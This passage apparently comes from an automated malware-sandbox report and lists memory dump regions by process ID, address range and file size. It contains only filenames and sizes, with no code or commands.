                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-375-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-365-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-377-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-381-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-380-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-369-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-484-0x00000000052E0000-0x000000000537C000-memory.dmp
                                                                                                    Filesize

                                                                                                    624KB

                                                                                                  • memory/3800-371-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-352-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-357-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-353-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3800-367-0x0000000005280000-0x00000000052DF000-memory.dmp
                                                                                                    Filesize

                                                                                                    380KB

                                                                                                  • memory/3804-78-0x0000000000530000-0x0000000000582000-memory.dmp
                                                                                                    Filesize

                                                                                                    328KB

                                                                                                  • memory/3804-99-0x0000000004FB0000-0x0000000005042000-memory.dmp
                                                                                                    Filesize

                                                                                                    584KB

                                                                                                  • memory/3804-323-0x0000000005BF0000-0x0000000005C66000-memory.dmp
                                                                                                    Filesize

                                                                                                    472KB

                                                                                                  • memory/3804-694-0x0000000007570000-0x00000000075C0000-memory.dmp
                                                                                                    Filesize

                                                                                                    320KB

                                                                                                  • memory/3804-85-0x00000000054C0000-0x0000000005A64000-memory.dmp
                                                                                                    Filesize

                                                                                                    5.6MB

                                                                                                  • memory/3964-515-0x000000001BD40000-0x000000001BD52000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/3964-613-0x000000001E710000-0x000000001E786000-memory.dmp
                                                                                                    Filesize

                                                                                                    472KB

                                                                                                  • memory/3964-617-0x000000001CA80000-0x000000001CA9E000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB

                                                                                                  • memory/3964-144-0x0000000000E60000-0x0000000000ECC000-memory.dmp
                                                                                                    Filesize

                                                                                                    432KB

                                                                                                  • memory/3964-503-0x000000001E180000-0x000000001E28A000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                  • memory/3964-648-0x000000001EA60000-0x000000001EC22000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.8MB

                                                                                                  • memory/3964-649-0x000000001F160000-0x000000001F688000-memory.dmp
                                                                                                    Filesize

                                                                                                    5.2MB

                                                                                                  • memory/3964-525-0x000000001CAC0000-0x000000001CAFC000-memory.dmp
                                                                                                    Filesize

                                                                                                    240KB

                                                                                                  • memory/4192-58-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.6MB

                                                                                                  • memory/4292-190-0x00000000005F0000-0x00000000005F1000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/4632-618-0x0000000005790000-0x00000000057B2000-memory.dmp
                                                                                                    Filesize

                                                                                                    136KB

                                                                                                  • memory/4632-615-0x0000000002A40000-0x0000000002A76000-memory.dmp
                                                                                                    Filesize

                                                                                                    216KB

                                                                                                  • memory/4632-687-0x0000000006490000-0x00000000064AA000-memory.dmp
                                                                                                    Filesize

                                                                                                    104KB

                                                                                                  • memory/4632-635-0x0000000005B10000-0x0000000005B2E000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB

                                                                                                  • memory/4632-686-0x00000000076A0000-0x0000000007D1A000-memory.dmp
                                                                                                    Filesize

                                                                                                    6.5MB

                                                                                                  • memory/4632-616-0x0000000005110000-0x0000000005738000-memory.dmp
                                                                                                    Filesize

                                                                                                    6.2MB

                                                                                                  • memory/4632-630-0x0000000005BB0000-0x0000000005F04000-memory.dmp
                                                                                                    Filesize

                                                                                                    3.3MB

                                                                                                  • memory/4632-628-0x0000000005960000-0x00000000059C6000-memory.dmp
                                                                                                    Filesize

                                                                                                    408KB

                                                                                                  • memory/4632-629-0x0000000005B40000-0x0000000005BA6000-memory.dmp
                                                                                                    Filesize

                                                                                                    408KB

                                                                                                  • memory/4760-274-0x0000000000A50000-0x0000000000EFA000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/4760-313-0x0000000000A50000-0x0000000000EFA000-memory.dmp
                                                                                                    Filesize

                                                                                                    4.7MB

                                                                                                  • memory/4808-191-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                    Filesize

                                                                                                    352KB

                                                                                                  • memory/4808-189-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                    Filesize

                                                                                                    352KB

                                                                                                  • memory/4808-123-0x0000000000B90000-0x0000000000B91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/5972-536-0x0000000000CE0000-0x0000000000CFA000-memory.dmp
                                                                                                    Filesize

                                                                                                    104KB

                                                                                                  • memory/6100-580-0x0000000004D30000-0x0000000004D6C000-memory.dmp
                                                                                                    Filesize

                                                                                                    240KB

                                                                                                  • memory/6100-573-0x0000000004CD0000-0x0000000004CE2000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/6100-566-0x0000000000440000-0x000000000045E000-memory.dmp
                                                                                                    Filesize

                                                                                                    120KB